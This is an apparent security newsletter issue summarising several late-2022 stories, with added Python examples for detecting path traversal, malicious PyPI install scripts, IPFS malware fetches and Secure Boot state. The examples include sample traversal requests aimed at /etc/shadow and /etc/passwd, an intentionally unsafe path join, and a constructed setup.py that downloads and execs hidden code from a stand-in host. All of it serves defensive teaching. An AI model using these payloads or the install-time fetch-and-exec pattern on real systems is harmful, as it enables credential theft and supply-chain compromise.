Cyber Today: Crypto Winter comes for FTX, oil and gas flow control vulnerability, images hide malware in PyPI
Crypto Winter comes for FTX
Earlier this week, crypto exchange Binance signed a letter of intent to acquire its rival FTX. This came after FTX experienced a liquidity crunch and reached out to Binance for assistance. The letter did not bind Binance to complete the acquisition, and less than a day after signing the deal, Coindesk’s sources say Binance appears highly unlikely to go forward with it, reportedly over concerns about FTX’s loan commitments. Over the last three days, FTX saw over $6 billion in withdrawals. Additionally, Bloomberg’s sources say the U.S. Securities and Exchange Commission and Commodity Futures Trading Commission have begun investigating FTX’s relationship with its sister entity Alameda Research over the potential mishandling of customer funds.
Vulnerability found in oil and gas utilities
Researchers at the security company Claroty discovered a vulnerability in a widely deployed flow computer used across oil and gas utilities. These computers calculate oil and gas volume and flow rates, which are essential for operations and also for billing. The high-severity path-traversal vulnerability would let an attacker obtain root access on the device, and from there take over the flow computer and remotely disrupt its ability to produce accurate measurements. The system’s maker, ABB, said it issued an advisory on the vulnerability to customers on July 14th, along with an update that resolves the issue. The company also advised that “proper network segmentation” adequately mitigates the vulnerability.
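The bug class in that story, shown generically as an added example that is not ABB’s code, Claroty’s proof of concept, or the affected product’s file layout: a file-serving handler that joins a client-supplied path onto a base directory sits beside a hardened version that decodes the request (twice, to catch double encoding), treats it as relative, resolves it, and refuses anything that lands outside the base. The base directory and the request lines are constructed for illustration.

```python
import os
import urllib.parse

# Constructed base directory for a hypothetical report-serving endpoint.
BASE_DIR = "/srv/flowcomputer/reports"


def unsafe_resolve(base, requested):
    """The bug pattern: joining a client-supplied path lets '..' walk out of base."""
    return os.path.normpath(os.path.join(base, requested))


def safe_resolve(base, requested):
    """Hardened form: decode, treat the request as relative, resolve symlinks,
    then require the result to still sit under base."""
    decoded = urllib.parse.unquote(urllib.parse.unquote(requested))  # second pass catches %252e
    base_real = os.path.realpath(base)
    candidate = os.path.realpath(os.path.join(base_real, decoded.lstrip("/\\")))
    if os.path.commonpath([base_real, candidate]) != base_real:
        raise PermissionError(f"path escapes {base}: {requested!r}")
    return candidate


def escapes_base(base, requested):
    """True when the hardened resolver rejects the request."""
    try:
        safe_resolve(base, requested)
    except PermissionError:
        return True
    return False


def is_traversal_attempt(path):
    """Cheap request-log check: any '..' segment after (double) URL decoding."""
    decoded = urllib.parse.unquote(urllib.parse.unquote(path))
    return ".." in decoded.replace("\\", "/").split("/")


# Constructed request lines, not captured traffic.
SAMPLE_REQUESTS = [
    "GET /reports/daily/2022-11-09.csv",
    "GET /reports/../../../etc/shadow",
    "GET /reports/%2e%2e/%2e%2e/%2e%2e/etc/shadow",
    "GET /reports/..%252f..%252fetc/shadow",
]


def flagged_requests(requests=SAMPLE_REQUESTS):
    """Request lines whose path component looks like a traversal attempt."""
    return [line for line in requests if is_traversal_attempt(line.split(" ", 1)[1])]


if __name__ == "__main__":
    print("unsafe join gives:", unsafe_resolve(BASE_DIR, "../../../etc/passwd"))
    print("hardened rejects it:", escapes_base(BASE_DIR, "../../../etc/passwd"))
    for line in flagged_requests():
        print("suspicious:", line)
```

The containment check on the resolved path is the part that matters; rejecting the literal string `..` is a useful log heuristic but not a defense, since encoded and platform-specific separators get past it.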
PyPI packages hiding malware in image files
Another day, another piece of malware hiding in the Python Package Index. Researchers at Check Point Research sent out an advisory warning about a malicious package named “apicolor.” The package contained an odd, non-trivial section of code at the beginning of its installation script that downloaded an image from the web. The install script then processed the image and ran the output it generated using Python’s exec function. Check Point notes that it regularly scans PyPI for malicious packages, but said this one stood out for its “unique and distinct” approach. While many malicious packages on PyPI are the product of copy-and-paste techniques, this one shows that obfuscation methods on the index evolve rapidly.
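A static check for the pattern Check Point describes, as an added example that is not the apicolor code or Check Point’s scanner: walk a setup script’s syntax tree and flag the combination of a network-capable import with a call to exec, eval, or compile whose argument is not a string literal. Both sample install scripts below are constructed for illustration; the module list is an assumption about what a download stage usually imports.

```python
import ast

# Constructed sample install scripts; neither is the real apicolor package.
BENIGN_SETUP = """
from setuptools import setup
setup(name="example", version="0.1", packages=["example"])
"""

SUSPICIOUS_SETUP = """
import requests
from setuptools import setup
img = requests.get("https://example.invalid/logo.png").content
payload = bytes(b ^ 0x20 for b in img[-256:]).decode()
exec(payload)
setup(name="example", version="0.1")
"""

# Modules whose import at install time signals a download stage (assumed list).
NETWORK_MODULES = {"requests", "urllib", "http", "socket"}
# Built-ins that turn generated data into running code.
DYNAMIC_EXEC = {"exec", "eval", "compile"}


def _root_module(name):
    return name.split(".")[0]


def scan_install_script(source):
    """Report network-capable imports and non-literal exec/eval/compile calls."""
    tree = ast.parse(source)
    network_imports = set()
    dynamic_exec_lines = []

    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for alias in node.names:
                if _root_module(alias.name) in NETWORK_MODULES:
                    network_imports.add(alias.name)
        elif isinstance(node, ast.ImportFrom) and node.module:
            if _root_module(node.module) in NETWORK_MODULES:
                network_imports.add(node.module)
        elif isinstance(node, ast.Call):
            func = node.func
            if isinstance(func, ast.Name) and func.id in DYNAMIC_EXEC:
                # exec("literal") is odd but reviewable; exec(variable) hides the payload.
                if node.args and not isinstance(node.args[0], ast.Constant):
                    dynamic_exec_lines.append(node.lineno)

    return {
        "network_imports": sorted(network_imports),
        "dynamic_exec_lines": dynamic_exec_lines,
        # Fetch-then-run is the pattern in the story; either signal alone is weaker.
        "suspicious": bool(network_imports) and bool(dynamic_exec_lines),
    }


if __name__ == "__main__":
    for label, src in (("benign", BENIGN_SETUP), ("suspicious", SUSPICIOUS_SETUP)):
        print(label, scan_install_script(src))
```

This only catches installers that keep the exec call in plain sight; a package that aliases the built-in or reaches it through getattr needs a broader rule, which is exactly why the report calls the technique an evolving one.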
Experian and T-Mobile settle on breaches
The two companies separately reached agreements with 40 US states to resolve claims arising from data breaches in 2012 and 2015. Experian will pay the bulk of the settlement at $14 million, with $2 million paid by the wireless carrier. The 2012 breach at Experian involved an insider who joined the company through an acquisition and sold data from over 3 million queries to third parties; the company did not alert regulators or impacted customers. The 2015 breach hit the Experian network where T-Mobile stored customer credit applications, impacting 15 million people. Experian offered two years of free credit monitoring after that breach, and the settlement will see it provide an additional five years, as well as free regular credit reports.
Thanks to today’s episode sponsor, AppOmni
Twitter rolls out Blue verification
Twitter rolled out its expected update to its Blue subscription service for iOS, which now gives subscribers a verification check mark as part of the $7.99 subscription. It’s unclear when it will arrive on Android, the web app, or in new markets. The company also tested showing a gray check mark on select accounts labeling them as “Official,” although owner Elon Musk summarily announced that he had “killed it.” Right now Blue only offers early access to new features, with Twitter promising longer video uploads, priority surfacing in search, and fewer ads as “coming soon.”
IPFS used for malware hosting
The distributed InterPlanetary File System, or IPFS, is a building block of web3. It also turns out to be a great way to host malware. That finding comes from researchers at Cisco Talos, who found it being used by multiple malware families to retrieve initial malware stages. IPFS lets an attacker make content available across many nodes at no cost, and because files are addressed by their content hash and can be fetched through any public IPFS gateway, hosted payloads are resilient to takedowns without the attacker paying for storage. The infection vectors remain the same: attackers must still direct victims to an IPFS file. Cisco recommends that organizations not involved in web3 simply block access to all IPFS gateways.
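Acting on that recommendation starts with knowing which gateways your hosts already talk to. The following is an added example, not Talos tooling: it pulls IPFS fetches out of proxy log lines in both URL shapes gateways accept, the path form (gateway/ipfs/CID) and the subdomain form (CID.ipfs.gateway), and lists the distinct gateway hosts for a blocklist. The log lines, source addresses, and CIDs are constructed and resolve to nothing; the CID patterns (CIDv0 as “Qm” plus 44 base58 characters, CIDv1 as base32 starting with “b”) are the common ones, not an exhaustive parser.

```python
import re

# CIDv0: "Qm" + 44 base58 chars. CIDv1 on gateways is usually base32 (a-z, 2-7)
# and starts with "b"; 59 characters is the common length, so 58+ after the "b".
CID = r"(Qm[1-9A-HJ-NP-Za-km-z]{44}|b[a-z2-7]{58,})"
PATH_GATEWAY = re.compile(r"https?://([^/\s]+)/ipfs/" + CID)
SUBDOMAIN_GATEWAY = re.compile(r"https?://" + CID + r"\.ipfs\.([^/\s]+)")
SRC = re.compile(r"\bsrc=(\S+)")

# Constructed proxy log lines; the CIDs are made up and do not exist.
SAMPLE_PROXY_LOG = """\
2022-11-10T12:01:02Z src=10.0.0.5 method=GET url=https://ipfs.io/ipfs/Qma1b2c3d4e5f6g7h8j9kAmBnCpDqErFsGtHuJvKwMxNyP/update.exe
2022-11-10T12:01:09Z src=10.0.0.7 method=GET url=https://www.example.com/ipfs-blog-post.html
2022-11-10T12:02:15Z src=10.0.0.5 method=GET url=https://bafybeiabcdefghijklmnopqrstuvwxyz234567abcdefghijklmnopqrst.ipfs.dweb.link/stage2.bin
2022-11-10T12:03:44Z src=10.0.0.9 method=GET url=https://cloudflare-ipfs.com/ipfs/not-a-cid/index.html
"""


def find_ipfs_fetches(log_text):
    """One record per request that pulled content through an IPFS gateway."""
    hits = []
    for line in log_text.splitlines():
        m = PATH_GATEWAY.search(line)
        if m:
            gateway, cid = m.group(1), m.group(2)
        else:
            m = SUBDOMAIN_GATEWAY.search(line)
            if not m:
                continue
            cid, gateway = m.group(1), m.group(2)
        src = SRC.search(line)
        hits.append({"src": src.group(1) if src else None, "gateway": gateway, "cid": cid})
    return hits


def gateways_seen(log_text):
    """Distinct gateway hosts, e.g. to seed a proxy blocklist for a non-web3 network."""
    return sorted({h["gateway"] for h in find_ipfs_fetches(log_text)})


if __name__ == "__main__":
    for hit in find_ipfs_fetches(SAMPLE_PROXY_LOG):
        print(hit)
    print("gateways:", gateways_seen(SAMPLE_PROXY_LOG))
```

The fourth sample line shows why matching on the CID rather than on the word “ipfs” matters: a gateway host appearing in a URL is not by itself a fetch of content-addressed data, and a blocklist built from hostnames alone would still miss a gateway the attacker stands up on their own domain, which is where the CID match earns its keep.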
Lenovo fixes UEFI Secure Boot
Security researchers at ESET discovered that Lenovo mistakenly shipped an early development driver, which allows Secure Boot settings to be changed from within the OS, in final production firmware. This impacted 54 laptops across Lenovo’s ThinkBook, IdeaPad, and Yoga lines, letting an attacker deactivate UEFI Secure Boot. Secure Boot is meant to ensure malicious code can’t load and execute during the boot process. Without it, someone with access to a machine could bypass OS-level security protections and install malware that persists after an OS wipe. Lenovo released a BIOS fix to resolve the issue on all affected machines, except for one IdeaPad model that has reached end of life.
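After applying a firmware fix like this one, the check a practitioner wants is whether Secure Boot is actually enforcing rather than merely present. The following is an added example, not ESET’s or Lenovo’s code: it reads the SecureBoot and SetupMode variables from efivarfs on Linux and classifies the platform state, treating setup mode as unprotected because in that mode the key databases can be rewritten without authentication. The GUID is the real EFI_GLOBAL_VARIABLE GUID and the efivarfs layout (a 4-byte attribute mask before the data) is the kernel’s; the sample blobs are constructed, not captured from an affected laptop.

```python
import os

# EFI_GLOBAL_VARIABLE GUID; SecureBoot and SetupMode are defined under it.
EFI_GLOBAL_VARIABLE = "8be4df61-93ca-11d2-aa0d-00e098032b8c"
EFIVARS_DIR = "/sys/firmware/efi/efivars"

# Constructed efivarfs blobs: 4-byte little-endian attribute mask
# (BOOTSERVICE_ACCESS | RUNTIME_ACCESS = 0x06) followed by the one-byte value.
SAMPLE_ENFORCING = {"SecureBoot": b"\x06\x00\x00\x00\x01", "SetupMode": b"\x06\x00\x00\x00\x00"}
SAMPLE_DISABLED = {"SecureBoot": b"\x06\x00\x00\x00\x00", "SetupMode": b"\x06\x00\x00\x00\x00"}
SAMPLE_SETUP_MODE = {"SecureBoot": b"\x06\x00\x00\x00\x00", "SetupMode": b"\x06\x00\x00\x00\x01"}


def parse_efivar(raw):
    """Split an efivarfs blob into (attribute mask, variable data)."""
    if len(raw) < 5:
        raise ValueError("efivarfs entry too short")
    return int.from_bytes(raw[:4], "little"), raw[4:]


def secure_boot_status(variables):
    """Classify raw efivarfs blobs keyed by variable name.

    'enforcing'  - SecureBoot=1 in user mode: boot binaries are signature-checked.
    'setup-mode' - SetupMode=1: PK/KEK/db are writable unauthenticated, so there is
                   no protection whatever the SecureBoot bit says.
    'disabled'   - SecureBoot=0 in user mode.
    'unknown'    - no SecureBoot variable (legacy BIOS boot, or efivarfs not mounted).
    """
    if "SecureBoot" not in variables:
        return "unknown"
    _, sb = parse_efivar(variables["SecureBoot"])
    setup = parse_efivar(variables["SetupMode"])[1] if "SetupMode" in variables else b"\x00"
    if setup[:1] == b"\x01":
        return "setup-mode"
    return "enforcing" if sb[:1] == b"\x01" else "disabled"


def read_efivars(directory=EFIVARS_DIR):
    """Read the two variables from a live Linux system; empty dict if unavailable."""
    found = {}
    for name in ("SecureBoot", "SetupMode"):
        path = os.path.join(directory, f"{name}-{EFI_GLOBAL_VARIABLE}")
        try:
            with open(path, "rb") as fh:
                found[name] = fh.read()
        except OSError:
            pass
    return found


if __name__ == "__main__":
    print("live system:", secure_boot_status(read_efivars()))
    for label, sample in (("enforcing", SAMPLE_ENFORCING), ("disabled", SAMPLE_DISABLED),
                          ("setup-mode", SAMPLE_SETUP_MODE)):
        print(label, "->", secure_boot_status(sample))
```

This reads firmware state as the OS sees it; it does not detect a driver that could flip that state, which is why the BIOS update, not a runtime check, is the actual fix.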
IBM plans to scale up quantum computers
IBM launched its new Osprey quantum processor, offering 433 qubits, 240% more than its last-generation Eagle processor from 2021. Big Blue’s current quantum roadmap ultimately plans a 4,000-qubit Kookaburra processor in 2025, preceded by a 1,121-qubit Condor processor next year and the 1,386-qubit Flamingo in 2024. The company also updated its Qiskit Runtime to make programming these larger chips a little easier, letting developers trade speed for a reduced error count, errors being a persistent issue in quantum systems. IBM also provided more details on its upcoming Quantum System Two, with a planned 2023 launch. This will integrate multiple quantum processors into a single system with high-speed links.